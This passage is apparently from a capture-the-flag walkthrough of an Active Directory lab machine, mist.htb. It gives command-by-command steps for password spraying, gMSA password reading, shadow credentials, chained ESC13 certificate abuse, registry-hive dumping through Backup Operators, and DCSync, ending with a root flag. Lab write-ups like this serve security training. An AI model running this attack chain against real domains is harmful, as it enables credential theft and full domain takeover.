Session..........: hashcat
Status...........: Cracked
```

To open `keepass` file from Linux, I used `keepassxc`

```bash
sudo apt install keepassxc
keepassxc sharon.kdbx
```

<figure><img src="/files/Z0szln1hxlgLOlR76M3w" alt=""><figcaption></figcaption></figure>

Trying the password against all the users I don't have yet, I got one hit

```bash
nxc ldap dc01 -u users.lst -p 'ImTiredxxxxxxx' 

LDAP        192.168.100.100 389    DC01             [-] mist.htb\Florence.Brown:xxxxxxxxxxxxxxxxx 
LDAP        192.168.100.100 389    DC01             [-] mist.htb\Jonathan.Clinton:xxxxxxxxxxxxxxxxx
LDAP        192.168.100.100 389    DC01             [-] mist.htb\Markus.Roheb:xxxxxxxxxxxxxxxxx 
LDAP        192.168.100.100 389    DC01             [-] mist.htb\Shivangi.Sumpta:xxxxxxxxxxxxxxxxx 
LDAP        192.168.100.100 389    DC01             [-] mist.htb\Harry.Beaucorn:xxxxxxxxxxxxxxxxx( 
LDAP        192.168.100.100 389    DC01             [+] mist.htb\op_Sharon.Mullard:xxxxxxxxxxxxxxxxx
```

Looking at `BloodHound CE`, the user `op_Sharon.Mullard` is a member of the `operatives` group, which can `ReadGMSAPassword` of `Svc_CA$`

<figure><img src="/files/sge9qnMJlc9NzAQqOOli" alt=""><figcaption></figcaption></figure>

```bash
nxc ldap dc01 -u op_Sharon.Mullard -p 'ImTirxxxxxxxxx' --gmsa

LDAPS  192.168.100.100 636  DC01 [*] Getting GMSA Passwords
LDAPS  192.168.100.100 636  DC01 Account: svc_ca$ NTLM:09814d63c9baxxxxxxxxxxxx
```

`SVC_CA$` can add `KeyCredentialLink` (Shadow Credential) to `svc_cabackup`

<figure><img src="/files/RGNuViOlpViB1WC1heps" alt=""><figcaption></figcaption></figure>

```bash
certipy-ad shadow auto -u 'svc_ca$@mist.htb' -hashes :09814d63c9baxxxxxxxxxxxx -account svc_cabackup
```

<figure><img src="/files/2Iia9FIGJGYVryBn8xKe" alt=""><figcaption></figcaption></figure>

> **ESC13**: If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.

Source [post](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-certificate-services/#esc13-issuance-policy).

From `BloodHound` I can see that, as a member of the `Certificate Services` group, I can abuse `ESC13` and add myself or anyone I want to the `Certificate Managers` group

<figure><img src="/files/k4EwrnvJvzaW5pXyu1gN" alt=""><figcaption></figcaption></figure>

`Certificate Managers` group is a member of `CA Backup` group

<figure><img src="/files/NgR73T3wJok9Ud10JP12" alt=""><figcaption></figcaption></figure>

Members of the `CA Backup` group can perform `ESC13` too, gaining membership in the `Services accounts` group, which is a member of the `Backup Operators` group.

<figure><img src="/files/yjrl06wwkMUW267VLVBp" alt=""><figcaption></figcaption></figure>

To summarize the attack path:

1. Perform `ESC13` to inherit the privileges of the `Certificate Managers` group
2. Perform `ESC13` again to inherit the privileges of the `Services accounts` group
3. Inherit `Backup Operators` privileges by being in the `Services accounts` group

Request a certificate for the vulnerable template `managerauthentication`

```bash
certipy-ad req -u 'svc_cabackup@mist.htb' -hashes :c9872f1bc10bdd522c12fc2ac9041b64 -template managerauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100
```

Authenticate as `svc_cabackup` to inherit the new privileges

```bash
certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb
impacket-ticketConverter svc_cabackup.kirbi svc_cabackup.ccache
```

<figure><img src="/files/CYb9ej8wNdAOqel6SFul" alt=""><figcaption></figcaption></figure>

Request a certificate for the vulnerable template `backupsvcauthentication`

```bash
certipy req -u 'svc_cabackup@mist.htb' -k -template backupsvcauthentication -ca mist-DC01-CA -key-size 4096 -dc-ip 192.168.100.100 -dns 192.168.100.100 -target dc01.mist.htb
```

Authenticate as `svc_cabackup` to inherit the new privileges

```bash
certipy-ad auth -pfx cert.pfx -kirbi -domain mist.htb
impacket-ticketConverter svc_cabackup.kirbi svc_cabackup2.ccache
```

<figure><img src="/files/p1gSctBLoUWkWBYehu1s" alt=""><figcaption></figcaption></figure>

Abuse the `Backup Operators` privilege to back up the registry hives

```bash
impacket-reg -k -no-pass mist.htb/svc_cabackup@dc01.mist.htb backup -o '\programdata'
```

Access the DC via WinRM to download the files

```powershell
evil-winrm -i dc01 -u op_Sharon.Mullard -p 'ImTiredOfThisJob:('

*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> cd C:\programdata

*Evil-WinRM* PS C:\programdata> download SAM.save

Info: Downloading C:\programdata\SAM.save to SAM.save
Info: Download successful!

*Evil-WinRM* PS C:\programdata> download SECURITY.save

Info: Downloading C:\programdata\SECURITY.save to SECURITY.save
Info: Download successful!

*Evil-WinRM* PS C:\programdata> download SYSTEM.save
Info: Downloading C:\programdata\SYSTEM.save to SYSTEM.save
Info: Download successful!
```

Dump the secrets from the hives, then perform `DCSync` with the `dc01$` account hash

```bash
impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
```

<figure><img src="/files/vBexP76E14LHHCrmiamO" alt=""><figcaption></figcaption></figure>

```bash
impacket-secretsdump mist.htb/'DC01$'@dc01 -hashes :e768c4cf883a87ba9e96278990292260 -just-dc-ntlm
```

<figure><img src="/files/t82j7jsNMSC0odyDtBoA" alt=""><figcaption></figcaption></figure>

Access the machine as Administrator

<figure><img src="/files/6woyZtsvuTW3k2veAMJs" alt=""><figcaption></figcaption></figure>

> Root Flag: f5dcf7a3f2377ef6759aa413c768303f

